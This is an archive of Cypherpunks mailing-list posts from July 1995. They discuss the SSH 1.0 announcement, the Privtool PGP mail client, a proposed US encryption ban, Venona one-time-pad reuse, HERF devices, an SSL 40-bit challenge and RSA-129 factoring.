>server makes it possible to quickly find someone, obtain their key, and
>send them a secure message.

Things that make you go hmmmm....

Ginger
Shei shuo zhong-guo hua?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 12 Jul 95 10:28:19 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
Message-ID: <199507121725.NAA17614@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <doug-9506121351.AA0053320@netman.eng.auburn.edu>,
Doug.Hughes@Eng.Auburn.EDU (Doug Hughes) wrote:

>Go see Winn Schwartau talk about HERF guns sometime. He passed around
>a picture of a device for < US$500 that could crash any computer within
>50 yards..  Then again, it isn't too good for the person firing the gun

URL, anyone? I'd like to build one of those devices.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAQFfSoZzwIn1bdtAQGWBQF/YHqHS5rJfVnuLDd3SV+oq1KhXsP47mE8
WW6IPO+mCDlN+liSfU/4NujUT7mAfLl1
=G/P3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 12 Jul 95 09:52:17 PDT
To: ylo@cs.hut.fi (Tatu Ylonen)
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <199507121451.RAA06122@shadows.cs.hut.fi>
Message-ID: <m0sW5hj-0009ydC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


FANTASTIC!!!!
I think we've all been waiting for / building this.
Kudos...

> Looking for a secure rlogin?
> Want to deter IP-spoofing, DNS-spoofing, and routing-spoofing?
> Want to run X11 connections and TCP/IP ports securely over an insecure network?
> Worried about your privacy?
> Then read this.
> 
> 
> Introducing SSH (Secure Shell) Version 1.0
...

Quibbles/suggestions:

ssh, while an obvious name, already collides with a nice shar decoder and
a different kind of secure shell from CFS.

Probably a worthwhile collision though.

Second: 

It would be very helpful if the socket connection could be made (optionally)
through a telnet proxy for firewalls (with optional quoting of problem
characters).  I've actually done this with TERM and a helper program.

I may produce a patch for this.

Third:

Of course support for S/Key and tokens/hand held authenticators would be
useful additions for some situations (although inferior to RSA...).

Forth:

Someone needs to crank out a Windows/Mac client... (Lower priority, but
still useful.)

Fifth:

udprelay etc. could also be borrowed from the term suite.

Sixth:

Integration with TCP/NFS and/or client-server CFS would be fantastic.
(One local CFS server acting as a secure client over tcp to a remote
CFS server.)
Remote encrypted mount of an encrypted partition...

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 10:39:33 PDT
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121658.AA0069320@netman.eng.auburn.edu>
Message-ID: <9507121739.AA10924@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> If you saw that PBS documentary (they want $20,000 for rebroadcast by the 
> way). It was an 87 or 88 or something like that. It would make you
> a believer. There was a lady in a van that whenever she used her cellular
> phone, her sun's breathing apparatus (lung impaired) went into alarm.
>  There was another case at a hospital pre-natal care word near the main
> entrance to the hospital. Several occasions when a local bus loop went
> by, and the guy happened to be talking on the intercom of the bus, several
> of the units in the ward went into alarm and failed (they had a tough time
> tracking that one down by the way). 

There is a huge difference between noting that some electronic
equipment is temporarily vulnerable to interference, or that you can
read screens at a distance from the emitted radiation, and saying that
you can build these portable ray-guns that cause computers to fry at
200 yards.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Wed, 12 Jul 95 10:49:05 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121505.AA10601@snark.imsi.com>
Message-ID: <Pine.A32.3.91.950712134619.10210J-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Perry E. Metzger wrote:

> Doug Hughes writes:
> > I think there was a question of some microelectronics being permenently
> > damaged because of fusion at the MOS level (burning through the
> > gate),
> 
> To do that requires that you transfer energy from your device into the
> computer you are attacking. How do you propose to do that?

airburst? :)

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 11:02:56 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <199507121754.KAA19611@blob.best.net>
Message-ID: <9507121801.AA10968@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" writes:
> At 07:46 AM 7/12/95 -0400, Perry E. Metzger wrote:
> >
> >
> >And why, pray tell, did you repost this here?
> 
> Presumably because government instruments of repression are entirely
> relevant to the Cypherpunks list.

I'll be posting my 900 page listing of prison locations, then. I'm
sure its relevant, right?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 12 Jul 95 11:29:04 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
In-Reply-To: <Pine.SUN.3.91.950712113043.23433A-100000@access1.digex.net>
Message-ID: <Pine.SUN.3.91.950712141642.11949B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Black Unicorn wrote:

> How elegant the way the National 
> Cryptological museum was opened.  No fanfare, no publicity, no 
> invitations, just there to be discovered at first, like a little 
> secret.  Stuck in an old motel, barely visible from Route 32, 
> dwarfed by the massive NSA complex.  

No way!  That hotel was the place my parents stayed on the night after 
their marriage...

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 12 Jul 95 05:42:07 PDT
To: pgf@tyrell.net
Subject: Re: FW: Edupage 7/9/95 (fwd)
Message-ID: <9507121233.AA15475@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



>    There are certain nazi pages in America. They were showing them in
>    a german tv magazine some time ago, but they didn't tell the URLs.
>    The URL field in the Mosaic window was painted over.

> How do you know they weren't local?


Because it was an article about Networks in America. They said
it was an american web server and they explained how they found
it. They found the link on one of these service web pages, and
they had an interview with the administrator of this server. They
asked him why he has put such links on his honorable server. He
answered he didn't have the time to check all references, but
in this certain case he will have a look at the page and decide
whether he will keep the link or not (if I remember everything well).
This was also an american server.

And the nazi pages were written in english. The pages were named
after the author of the pages (something like 'The XY report', where
XY was the authors name, but I can't remember it. The author was
an american).

BTW: The german tv magazine was the "Kulturreport".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 12 Jul 95 11:58:03 PDT
To: sebaygo@intellinet.com
Subject: Re: Stormfront (was Re: FW: Edupage 7/9/95 (fwd))
In-Reply-To: <Pine.3.89.9507111731.B24086-0100000@sibyl.intellinet.com>
Message-ID: <199507121855.OAA29076@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Tue, 11 Jul 1995, Perry E. Metzger wrote:

> > I suspect that something is amiss (i.e. faked) about the following,
> > but wat.com shows up as
> > 
> > Wongs Advanced Technologies (WAT-DOM)
> >    3221 Danny Pk
> >    Metairie, LA 70002
> > 
> >    Domain Name: WAT.COM


The following seems to work.
>      http://stormfront.wat.com/stormfront/

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hardin@cyberspace.com
Date: Wed, 12 Jul 95 13:13:15 PDT
To: perry@imsi.com
Subject: Re: QED_jak
Message-ID: <9507122009.AA0581@localhost>
MIME-Version: 1.0
Content-Type: text/plain





Perry Metzger writes:
> 
> 
> John Young writes:
> >    "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
> >    Clues That Led to Code-Breaking."
> > 

[snip]
> The reports claimed the spys were using one time pads in some flawed
> manner, but did not explain very well what the problem was. Does
> anyone out there know?
> 
> .pm
> 
> 
> 

A real good book with a fair amount of details is Peter Wright's great
book "Spycatcher". The clueless media concentrated on Wright's allegation
that Sir Roger Hollis, head of MI5 was a Soviet mole or the "5th Man"
of the Philby, Burgess, Maclean & Blunt spyring. Now Wright may have been
in Jesus Angleton's psychotic "wilderness of mirrors" too long, but he
did a lot of bugging & stuff w/ GCHQ & he spends a great deal of his book
talking about precisely the Venona decrypts. Briefly there was some reuse
of "one time pads". He gives a fair amount of detail, & I suspect this is
why HRM Govt. was so displeased, the supposed "embarrassment" of the
allegations against long dead Sir Roger being just a cover story & much
easier for the tabloids & general public to understand.

tjh 


This is 1/713 of PGP262i DOS Executable Zipfile UUE'd
Violate the Un-Constitutional ITAR Today!
Get YOUR chunk @ web site below.

------------------ PGP.ZIP Part [005/713] -------------------
M@UIXP9EW\".^Q0XL1SO8"^*_O:U-=H(P&2,1A6YHB?KP@@H2/)$+P@-<PX_(
MPTGLPBHDHSW<(,<O,D$XB'2TA`HQ4D'H@R#<)[Z3*D$P80%N*8D1:Q6"T`\J
M/*/<G_$-/L9&%#L)P@HD82`ZHPG4$%#L*`A7D8M#F(/>"($GRAT$8246(Q:3
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Wed, 12 Jul 95 13:00:08 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121658.AA0069320@netman.eng.auburn.edu>
Message-ID: <Pine.SOL.3.91.950712144956.21040X-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Doug Hughes wrote:
> Keep in mind that newer planes (767, 757) let you do anything you want
> while the plane is in flight (but now while landing or takeoff), so they
> probably build better instrumentation and cabin shielding into the planes
> these days. If they say keep it off, chances are they have a good reason..
> 
> If you find categorical evidence to the contrary, I'm sure I would be very
> relieved to see it posted here. (rather than wondering if somebody
> in one of the 30 rows ahead of me might decide he knows better)
> 
> Disclaimer: I have absolutely no idea what kind of shielding goes into
> an airplane nor any knowledge of building practices in the airline industry,
> but that should be obvious. ;)

In the Canadian CFS (Canada Flight Supplement), a manual distributed to 
all Canadian pilots and continuously updated, there is a section on this 
kind of thing.   The basic gist of it is that there is no proof that 
computers and cells cause interference, tests have proved inconclusive, 
but there is suspicion.  Then, of course, is a silly little form that you 
are supposed to fill out if you ever have such a problem.

As for cells, a collegue (with his Commercial rating, was going for an
Airline Transport Rating) swore up and down that cells do nothing, and
that the only reason there are phones on airplanes is because with a
standard cell you can phone just about anywhere locally because of the
range an air-ground connection would have a 30,000'.  The plane phones are
supposed to have some sort of device that uses the local cell and forces 
you to pay LD charges.  Whether it is true or not....

But anyway, aircraft instruments operate in just about all bandwiths (HF, 
VHF, UHF mainly, with VHF being very popular.)

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com (Bryna Bank/Jamie Lawrence)
Date: Wed, 12 Jul 95 15:09:51 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Racketeering Act
Message-ID: <199507122200.PAA23874@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>    "(a) It shall be unlawful--
> 
> . . .
> 
>       "(2) to distribute computer software that encodes or encrypts
>     electronic or digital communications to computer networks that the
>     person distributing knows, or reasonably should know, is accessible to
>     foreign nationals and foreign governments, regardless of whether such
>     software has been designated nonexportable."

Oh no - I can already see the T-shirt ideas congealing in people's minds:

Lbher Ohfgrq

in big block letters.

-j

-- 
On the internet, nobody knows you're a deity.
__________________________________________________________________________
Jamie Lawrence and Bryna Bank                          <foodie@netcom.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alex <cp@proust.suba.com>
Date: Wed, 12 Jul 95 13:00:15 PDT
To: cypherpunks@toad.com
Subject: Re: SSL RC4 challenge
In-Reply-To: <199507121722.KAA19834@jobe.shell.portal.com>
Message-ID: <199507122003.PAA02843@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Here is a challenge to try breaking SSL using the default exportable
> encryption mode, 40-bit RC4.  It consists of a record of a submission
> of form data which was sent to Netscape's electronic shop order form in
> "secure" mode.  However the data I entered in the form is not my real
> name and address.  The challenge is to break the encryption and recover
> the name and address info I entered in the form and sent securely to
> Netscape.

Can't we hold off a few weeks on this, so that we can all short the stock 
once it's been offered? <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Wed, 12 Jul 95 14:20:37 PDT
To: danisch@ira.uka.de
Subject: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <9507121233.AA15475@elysion.iaks.ira.uka.de>
Message-ID: <199507122115.AA03497@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


BTW, I read some of the follow-up messages and it turns
out the pages in question _weren't_ in the United States.

They were in Metarie!

I didn't mean to sound critical, BTW; it's just that after
the "porn is only a click away" school of journalism that's
been going on in _this_ country (loosely defined enough to
include Louisiana).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 12 Jul 95 08:41:28 PDT
To: linux-announce@stc06.ctd.ornl.gov
Subject: Privtool 0.84a
Message-ID: <Pine.3.89.9507121633.A23453-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Ok, version 0.84 didn't work properly on Linux, so I'm now releasing
a version 0.84a with fixes to make it compile. US users can get the
sources from from ftp.c2.org:/pub/privtool/privtool-0.84a.tar.gz, or
in Europe at ftp.ox.ac.uk:/pub/crypto/pgp/utils/privtool-0.84a.tar.gz.
It will also be available soon on ftp.dsi.unimi.it.

US ITAR laws may make it a crime to export Privtool, so if (like
me) you're not in the US then get it from the European sites.

In addition the documentation is available on the WWW at 
http://www.c2.org/~mark/privtool/privtool.html.

		Mark

	Privtool Beta Release	@(#)README.1ST	1.16 7/12/95
	-----------------------------------------------------

Privtool ("Privacy Tool") is intended to be a PGP-aware replacement 
for the standard Sun Workstation mailtool program, with a similar user 
interface and automagick support for PGP-signing and PGP-encryption. Just 
to make things clear, I have written this program from scratch, it is
*not* a modified mailtool (and I'd hope that the Sun program code
is much cleaner than mine 8-) !). 

When the program starts up, it displays a list of messages in your 
mailbox, along with flags to indicate whether messages are signed 
or encrypted, and if they have had their signatures verified or 
have been decrypted.

When you double click on a message, it will be decrypted (requesting
your passphrase if neccesary), and/or will have the signature checked,
and the decrypted message will be displayed in the top part of the
display window, with signature information in the bottom part. The
mail header is not displayed, but can be read by pressing the 'Header'
button to display the header window. In addition, the program has
support for encrypted mailing list feeds, and if the decrypted
message includes another standard-format message it will replace
the original message and be fed back into the display processing
chain.

When composing a message or replying to one, the compose window has
several check-boxes, including one for signature, and one for
encryption. If these are selected, then the message will be automatically
encrypted and/or signed (requesting your passphrase when neccesary) before
it is sent. You may also select a 'Remail' box, which will use the
Mixmaster anonymous remailer client program to send the message through
one or more remailers.

Being an Beta release, there are a number of bugs and nonfeatures :

Known Bugs :

	Message list scrollbar often set to stupid position when loading
	a mail file.

	When you save changes to the mail file, it throws away the
	signature verification and decrypted messages, so that the
	next time you view a message it has to be verified or decrypted
	again.

	'New mail' indicator in icon does not go away if you open the
	window and close it again without reading any messages.

Known Nonfeatures :

	Currently if you send encrypted mail to multiple recipients, all must
	have valid encrpytion keys otherwise you will have to send the
	message decrypted. Also, the message will be sent encrypted to all
	users, not just the one who is receiving each copy.

	'Add Key' button is enabled and disabled as appropriate, but does
	not do anything ! A number of other buttons and menu items do
	not work either.

	Passphrase is stored in ASCII rather than MD5 form, making it
	easier for hackers to find if you're on a multi-user machine (of 
	course, you shouldn't be, but many of us are).

	Kill-by-subject does not work.

	Ignores Reply-To: lines, and could probably do with an improved
	mail-reading algorithm.

	Only one display window, and only one compose window.

	Code should be more modular to assist with ports to Xt, Motif, Mac,
	Windows, etc. 

	Not very well documented !

	Encrypted messages are saved to mail files in encrypted form. There
	is currently no option to save messages in decrypted form.

	No support for anonymous return addresses.

	Not very well tested on Solaris 2.x, or Linux.

Major changes for 0.84:

	Added 'Forward' option to 'Compose' button.

	Support for Mixmaster and multiple pseudonyms. Due to a bug in
	the current version of Mixmaster, note that messages have to
	be saved to a temporary file for mailing. 

	Fixed file descriptor leak in pgplib.c which could make the program
	hang occasionally when saving changes.

	Added support for 'smallring.pgp' to speed up access to commonly
	used public keys.

	This version is thought to work on Linux, however I haven't
	been able to test that myself. Changes supplied by
	David Summers (david@actsn.fay.ar.us).

Changes for 0.84a:

	Linux testing showed up some problems with 0.84. This has been
	solved by using Rich Salz's parsedate() function to parse the
	dates on mail messages. This is now supplied in a linux
	subdirectory, and appropriate changes made to the Makfile to
	allow it to compile correctly on Linux. Changes supplied by
	David Summers (david@actsn.fay.ar.us).

	Fixed another hang by deleting the lock file if we failed to
	open the mail file while saving a message.

Privtool can be compiled to either use PGPTools, or to fork off a copy of
PGP whenever it is needed. There are also a number of different security
level options for the passphrase, varying from 'read it from PGPPASS and
keep it in memory' to 'request it every time and delete it as soon as
possible', via 'request it when neccesary and delete it if it's not used
for a while'.

See the README file for information on compiling the code, and the
user.doc file for user documentation (the little that currently 
exists). You should also ensure that you read the security concerns
section in user.doc before using the program.

		Mark Grant (mark@unicorn.com)



-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAgUBMAPq5lVvaTo9kEQVAQG48gf9EXXCBm42agXpfJP1ePuI5zbDujtaWhGb
khAPRrlPJJ5QeZp3wz0DMDjhvSJjz2dlyxYj5u61kgbfybhxr2lAzwYL4k89A/B+
aHSggEMpKYwosd9FZEZ30pG1ufYeEI0eJw0hHuZzIIbGzTy3x+IfVY9h41F+ewkV
fbAtw5jwZKI43cil0cds3DFLHYOhiuWUU72KUCHABgvQfLPBYCJ4F3nW64GduxtA
idjHrcfe3ZJNLJEQ1VsHbqbAgND2jzB/8C84kw9Nb9wgd+zTdgnnJPWidpqHZqe2
ymBX1JD675WrKORnZlTI28haIcajPnLp5nXy2Ycs+/5RMuW/AVlYhg==
=4M+l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 12 Jul 95 14:46:05 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Dr. Seuss, Technical Writer
In-Reply-To: <199507121756.KAA04759@netcom5.netcom.com>
Message-ID: <Pine.ULT.3.91.950712164553.5003A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thanks so much for lightening my day.  Submit it to rec.humour.funny.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Wed, 12 Jul 95 13:57:22 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Q E D_j a k
In-Reply-To: <199507121947.MAA28807@ix5.ix.netcom.com>
Message-ID: <Pine.A32.3.91.950712165501.10002C-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Bill Stewart wrote:

> (Yes, I know one-time-pads are provably good crypto, but they also
> depend on the security of key distribution and one-time use,
> which apparently broke down here.  And the CIA's pretty good at
> chasing the guy with briefcases of code material handcuffed to their arms.)

Actually this stuff is most likely shipped under diplomatic pouch.

____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  

Ben.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 14:06:42 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <m0sW9UK-0009ydC@sdwsys>
Message-ID: <9507122105.AA11297@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Stephen D. Williams writes:
> It occurred to me that it wouldn't be too tough to have one CFSD
> open a TCP/socket connection to another CFSD and pass file access
> requests instead of implementing them locally.  The encryption
> of the ssh link and the on disk encryption of CFSD should be a 
> good combination.

The whole point of CFS was that you could mount remote devices that
were encrypted and decrypt them locally. CFS acts like a scrim over
existing file systems. If the remote machine has your keys on it
you've reduced security and, seemingly to me, gained very little.

Now, what *would* be really neat would be an implementation of CFS in
kernel under 4.4lite using the stacked vnode architecture. It would
probably be fairly simple to do it, and you wouldn't have any context
switches or the like when cfs'ing...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 12 Jul 95 17:07:01 PDT
To: cypherpunks@toad.com
Subject: Re: RSA129 Project
In-Reply-To: <v01520d00ac2a09c57dc2@[144.38.16.209]>
Message-ID: <199507130006.RAA22366@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> rross@sci.dixie.edu (Russell Ross) writes:
> Could someone point me to information about the RSA129 factoring project?
> I would like the see the programs involved, and learn a little about the
> coordinating efforts.

There's a PostScript paper, programs, and coordinating tools at
ftp.ox.ac.uk:pub/math/rsa129

	Jim Gillogly
	Highday, 20 Afterlithe S.R. 1995, 00:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 12 Jul 95 14:23:28 PDT
To: cypherpunks@toad.com
Subject: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <Pine.SOL.3.91.950712171632.1850A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 12 Jul 1995 15:28:25 -0400
Subject: Anti-Electronic Racketeering Act of 1995


On June 27, Sen. Grassley introduced extensive criminal amendments to the
federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
(wiretapping), and 42 USC 2000aa (Privacy Protection Act).

This proposed legislation is Very Bad. It would make all encryption
software posted to computer networks that are accessible to foreigners
illegal *regardless of whether the NSA has classified the software as a
munition!!!*  Here's the language:

 "Sec. 1030A.  Racketeering-related crimes involving computers
   "(a) It shall be unlawful--

. . .

      "(2) to distribute computer software that encodes or encrypts
    electronic or digital communications to computer networks that the
    person distributing knows, or reasonably should know, is accessible to
    foreign nationals and foreign governments, regardless of whether such
    software has been designated nonexportable."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Wed, 12 Jul 95 16:28:28 PDT
To: cypherpunks@toad.com
Subject: RSA129 Project
Message-ID: <v01520d00ac2a09c57dc2@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


Could someone point me to information about the RSA129 factoring project?
I would like the see the programs involved, and learn a little about the
coordinating efforts.

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 12 Jul 95 13:54:24 PDT
To: ylo@cs.hut.fi (Tatu Ylonen)
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <199507121916.WAA06662@shadows.cs.hut.fi>
Message-ID: <m0sW9UK-0009ydC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > ssh, while an obvious name, already collides with a nice shar decoder and
> > a different kind of secure shell from CFS.
> 
> Ssh has already been registered with IANA (Internet Assigned Numbers
> Authority) as the name of the service.  I would rather not change it
> without a compelling reason.  It is also easy to obtain from rsh by
> replacing the r by s (which also makes for scp, sshd, and in future
> maybe also sdist).  It is my understanding that CFS is in rather
> limited use (especially outside the US), and the ssh shar extractor is
> not widely used either (neither can be found from the archie database
> at archie.funet.fi).  IETF has a thing called Site Security Handbook
> that they abbreviate SSH, but it is probably sufficiently different
> not to be confused.

I agree as the collisions aren't too bad (except in my /usr/local/bin...).

> > Of course support for S/Key and tokens/hand held authenticators would be
> > useful additions for some situations (although inferior to RSA...).
> 
> True.
> 
> The agent protocol can currently be used to forward a connection to
> any program (which can mean device) that can perform RSA
> authentication.  New authentication methods can be compatibly added
> later.
> 
> S/Key can be used by making skeysh you login shell.  Then you will
> first be asked for a normal password (if any), and then for the
> one-time password.  I did not want to incorporate skey functionality
> directly into the software, because it is not clear to me if the
> arrangements in use (file names, formats, algorithms) have stabilized
> yet.  Also, there is less need for skey as no passwords are
> transmitted in the clear.
> 
> > Integration with TCP/NFS and/or client-server CFS would be fantastic.
> > (One local CFS server acting as a secure client over tcp to a remote
> > CFS server.)
> > Remote encrypted mount of an encrypted partition...
> 
> Maybe, *maybe*, TCP/IP port forwarding could be used for this?  (I
> don't know what CFS does because I have never seen CFS.)

I was actually contemplating a modification to CFS to support a
tunneled TCP based NFS related operation.

CFS, like other specialized NFS servers, talks to NFS clients like
the normal NFS server, but runs on a different RPC port (so you can
run several types of NFS servers).  CFS encrypts directories that 
can be attached and detached without changing the NFS mount.

It occurred to me that it wouldn't be too tough to have one CFSD
open a TCP/socket connection to another CFSD and pass file access
requests instead of implementing them locally.  The encryption
of the ssh link and the on disk encryption of CFSD should be a 
good combination.

I've been compiling under Linux and have had a number of autoconfiguration
errors.  I'll produce a simple-minded patch shortly.
(Thinks I'm cross-compiling, have some include files I don't, don't
have waitpid/wait3, collision with stdc crypt/random defs, etc.)

>     Tatu

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 12 Jul 95 14:51:31 PDT
To: cypherpunks@toad.com
Subject: Re: [rah@shipwright.com: Re: digital monies]
Message-ID: <v02120d02ac29f2cdda83@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Steve,

I'm forwarding this to cypherpunks, where this posting originated. Always
ready to set the record straight. By the way, could I have an email copy of
your original posting/publicity material for this, I'm curious about where
it was announced to the net. Tighten up my links to the straight dope, etc.

Thanks!

Bob Hettinga


>Bob,
>
>Carl Ellison at TIS brought this to my attention.  We'll provide you with a
>lengthier response in a bit, but let me comment briefly that the following
>contains a number of inaccuracies.  Two of particular note: Citibank is not
>a principal in CyberCash, and the vaporware footnote is peculiar because
>our system has been operational since early April and the client software,
>which runs as a "viewer" with a number of browsers, is available from our
>web site for downloading around the world.
>
>Steve
>
>
>>CyberCash
>>The last I heard from these guys, a "consortium" of various heavies like RSA
>> and I believe Citibank even, was an article plastered all over the
>>Marketing section of the Wall Street Journal last fall. To my knowlege they
>>haven't come up for air. My memory of 'consortia' like this one, and
>>Citicorp in particular (who was trying to reverse engineer Chaum's Digicash
>>patent last time I looked), leads me to believe this dog won't hunt, or at
>>least not until the coon's already been treed, anyway. Cf: Citi's Quotron
>>boondoggle.
>
>--------------------
>Steve Crocker
>CyberCash, Inc., Suite 430                        Work: +1 703 620 4200
>2100 Reston Parkway                               Fax:  +1 703 620 4215
>Reston, VA 22091                                  crocker@cybercash.com

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






